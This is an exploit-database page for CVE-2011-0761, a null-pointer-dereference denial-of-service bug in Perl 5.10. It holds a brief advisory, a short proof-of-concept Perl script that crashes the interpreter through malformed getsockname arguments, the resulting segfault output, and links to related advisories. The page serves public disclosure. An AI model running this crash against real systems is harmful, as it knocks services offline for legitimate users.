Lucene search
Jonathan BrossardEDB-ID:35725HistoryMay 03, 2011 - 12:00 a.m.
Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities
2011-05-0300:00:00
Jonathan Brossard
www.exploit-db.com
16
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/47766/info
Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference.
An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
Perl versions 5.10.x are vulnerable.
jonathan () blackbox:~/test$ cat poc1.pl
#!/usr/bin/perl
$a =
getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792);
jonathan () blackbox:~/test$ perl poc1.pl
Segmentation fault (core dumped)
jonathan () blackbox:~/test$Related
cve
cve
CVE-2011-0761
2011-05-13 17:05:41
nvd
nvd
CVE-2011-0761
2011-05-13 17:05:41
openvas
openvas
Perl Denial of Service Vulnerability - Windows
2011-05-23 00:00:00
Perl Denial of Service Vulnerability (Windows)
2011-05-23 00:00:00
Gentoo Security Advisory GLSA 201311-17
2015-09-29 00:00:00
cvelist
cvelist
CVE-2011-0761
2011-05-13 17:00:00
debiancve
debiancve
CVE-2011-0761
2011-05-13 17:05:41
prion
prion
Null pointer dereference
2011-05-13 17:05:00
ubuntucve
ubuntucve
CVE-2011-0761
2011-05-13 00:00:00
nessus
nessus
GLSA-201311-17 : Perl: Multiple vulnerabilities
2013-11-29 00:00:00
RHEL 6 : perl (Unpatched Vulnerability)
2024-06-03 00:00:00
gentoo
gentoo
Perl: Multiple vulnerabilities
2013-11-28 00:00:00